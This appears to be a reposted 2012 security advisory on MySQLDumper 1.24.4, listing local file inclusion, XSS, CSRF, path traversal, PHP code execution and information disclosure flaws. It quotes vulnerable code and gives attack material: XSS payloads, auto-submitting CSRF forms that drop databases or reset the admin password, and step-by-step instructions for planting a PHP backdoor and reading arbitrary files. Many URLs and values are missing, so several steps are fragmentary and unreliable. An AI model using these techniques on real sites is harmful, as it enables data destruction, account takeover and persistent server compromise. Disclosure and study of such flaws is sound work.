MySQLDumper 1.24.4 Multiple Vulns

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047564 漏洞类型
发布时间 2012-04-28 更新时间 2012-04-28
漏洞平台 N/A CVSS评分 N/A
Vulnerable Software: MySQLDumper Version 1.24.4
Downloaded from:
(MD5 SUM: b62357a0d5bbb43779d16427c30966a1 *
About Software:
What is MySQLDumper ?
MySQLDumper is a PHP and Perl based tool for backing up MySQL databases.
You can easily dump your data into a backup file and - if needed - restore it.
It is especially suited for shared hosting webspaces, where you don't have shell access.
MySQLDumper is an open source project and released under the GNU-license.
Safe mode off
OS: Windows XP SP2 (32 bit)
PHP Version:
MYSQL: 5.5.23

Vuln Desc:
MySQLDumper Version 1.24.4 is prone to:
LFI,XSS,CSRF,PHP CODE ExeCution,traversal,Info Disclosure vulns.

Local File Inclusion
/* Vulnerable COde Section

if (!@ob_start("ob_gzhandler")) @ob_start();
foreach ($_GET as $getvar=>$getval)
foreach ($_POST as $postvar=>$postval)
include_once ( './inc/functions.php' );
include_once ( './inc/mysql.php' );
include_once ( './inc/runtime.php' );
if (!isset($language)) $language="en";

include ( './language/lang_list.php' );
include ( 'language/' . $language . '/lang_install.php' );
include ( 'language/' . $language . '/lang_main.php' );
include ( 'language/' . $language . '/lang_config_overview.php' );


XSS on inputs via $_POST;
/*VUlnerable code section
if (!@ob_start("ob_gzhandler")) @ob_start();
include ('./inc/functions.php');
$page=(isset($_GET['page'])) ? $_GET['page'] : 'main.php';
if (!file_exists("./work/config/mysqldumper.php"))
	header("location: install.php");
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Author" content="Daniel Schlichtholz">

<frameset border=0 cols="190,*">
	<frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize
		frameborder="0" marginwidth="0" marginheight="0">
	<frame name="MySQL_Dumper_content" src="<?php
	echo $page; // <=here is
		scrolling="auto" frameborder="0" marginwidth="0" marginheight="0">


XSS via $_GET;%3C/script%3E&language=en&submit=Installation;%3C/script%3E;%3C/script%3E&tablename=1;%3C/script%3E

CSRF Delete application protection via $_GET
<img src="" />

*After this Application will become fully unprotected from World.*

CSRF Drop database:

<img src="http://localhost/tld/meonyourpc.PNG" heigth="250" width="300" />
<form name="hackit" id="hackit" action="" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">

kill0 is always information_schema (obviously you can't drop it)
Try to increment that index
in ex:
kill1  etc.

CSRF Uninstall Application via $_GET
or  (This will delete existing config.php file)

CSRF change password:

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="">
<input name="username" id="username" type="text" value="pwnyou" />
<input name="userpass1" id="userpass1" type="text" value="pwnyou" />
<input name="userpass2" id="userpass2" type="text" value="pwnyou" />
<!--SHA1 (all Systems) -->
<input type="radio" name="type" id="type2" value="2" checked="checked" >


CSRF:Execute SQL commands via $_GET
In eg:( Create Denial Of Service Condition)
<img src=",md5%28now%28%29%29%29--" heigth="0" width="0" />

After gain access to application (in eg: after successfully exploitation CSRF  via delete protection technique)
remote attacker can use this techniques to upload his/her backdoor.
As result this will completely compromise site.
*Upload backdoor:*
Rename your backdoor on your pc to me.php.gz
Then switch to:
Upload it:
Then Switch to:
On input box called: File:
enter relative/absolute path to your uploaded me.php.gz  (default ./work/backup/me.php.gz)
Click RELOAD button.
On inputbox called File: Change file extension to:
Click save button and Vuala you have your own backdoor there.
You can find it:

Same tehcnique can be used without upload any file:
Todo so:
Switch to

Enter non existent file name on input called File:
in eg:
Click reload button.
it will ask *Create it?*
Click *Create* Button.
Copy paste your backdoor content to textarea and Click Save button.

Same technique can be used to add CUSTOM .htaccess Handler (to execute backdoor in eg: as *.gif file)

*NOTE* Second technique can be used by attacker to overwrite existing files./read arbitraty files on site/server.

Theris also chance to execute our code using eval PHP language *construct*.
We have PHP Code ExeCution here:

Vulnerable code section:
if (isset($_POST['selected_config'])||isset($_GET['config']))
	if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
	// Configuration was switched in content frame?
	if (isset($_GET['config'])) $new_config=$_GET['config'];
	// restore the last active menuitem
	if (is_readable($config['paths']['config'].$new_config.'.php'))
		if (read_config($new_config))
			$_SESSION['config_file']=$new_config; //$config['config_file'];
			<script language="JavaScript" type="text/javascript">
			if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
				var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
			else selected_div=\'\';
		if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern

As you can see we can traverse it +

if we will look to read_config() function

function read_config($file=false)
	global $config,$databases;
	if (!$file) $file=$config['config_file'];
	// protect from including external files
	$search=array(':', 'http', 'ftp', ' ');
	$replace=array('', '', '', '');

	if (is_readable($config['paths']['config'].$file.'.php'))
		// to prevent modern server from caching the new configuration we need to evaluate it this way
	return $ret;

 this means remote attacker can iterate his/her code as PHP.(Notice: eval($f))

 Our exploit:
  where ss = ss.php
#cat ss.php # in eg attacker uploaded his/her own file:
echo 'Our command executed ' . getcwd();

Print screen:

Theris also a lot of CROSS Site Scripting Vulnerabilities: (XSS)
Switch to:

select '<script>alert(1);</script>'

and click Execute SQL Statement.

/*Vulnerable Code Section:
if (isset($_GET['action'])&&$_GET['action']=='dl') $download=true;
include ('./inc/header.php');
include_once ('./language/'.$config['language'].'/lang.php');
include_once ('./language/'.$config['language'].'/lang_filemanagement.php');
include_once ('./language/'.$config['language'].'/lang_config_overview.php');
include_once ('./language/'.$config['language'].'/lang_main.php');
include_once ('./inc/functions_files.php');
include_once ('./inc/functions_sql.php');
if ($config['auto_delete']==1) $msg=AutoDelete();
get_sql_encodings(); // get possible sql charsets and also get default charset
//0=Datenbank  1=Struktur
$action=(isset($_GET['action'])) ? $_GET['action'] : 'files';
$kind=(isset($_GET['kind'])) ? $_GET['kind'] : 0;
$expand=(isset($_GET['expand'])) ? $_GET['expand'] : -1;
$selectfile=(isset($_POST['selectfile'])) ? $_POST['selectfile'] : "";
$destfile=(isset($_POST['destfile'])) ? $_POST['destfile'] : "";
$compressed=(isset($_POST['compressed'])) ? $_POST['compressed'] : "";
$dk=(isset($_POST['dumpKommentar'])) ? ((get_magic_quotes_gpc()) ? stripslashes($_POST['dumpKommentar']) : $_POST['dumpKommentar']) : "";
$dk=str_replace(':','|',$dk); // remove : because of statusline
$dump['sel_dump_encoding']=(isset($_POST['sel_dump_encoding'])) ? $_POST['sel_dump_encoding'] : get_index($config['mysql_possible_character_sets'],$config['mysql_standard_character_set']);
$dump['dump_encoding']=isset($config['mysql_possible_character_sets'][$dump['sel_dump_encoding']]) ? $config['mysql_possible_character_sets'][$dump['sel_dump_encoding']] : 0;

if ($action=='dl')
	// Download of a backup file wanted
	if (is_readable($file))
		header('Content-Description: File Transfer');
		header('Content-Type: application/octet-stream');
		header('Content-Disposition: attachment; filename='.basename($file));
		header('Content-Transfer-Encoding: binary');
		header('Expires: 0');
		header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
		header('Pragma: public');
		header('Content-Length: '.(string) filesize($file));
		while (!feof($file))
			print fread($file,round(100*1024));



This technique can be used by attacker to download arbitraty files from site/server.
Print screen:

Information Disclosure:
Try to Direct access to this file:
Generates a lot of Notice's.
Generates a lot of Notice's.
Fatal error: Call to undefined function MSD_mysql_connect() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\cubemail\inc\functions.php on line 147

NOTE: May be previous versions too affected but not tested.

================================ EOF ======================================

+++++++Greetz to all++++++++++ and
to all AA Team.
Thank you.

/AkaStep ^_^
Live 1335567729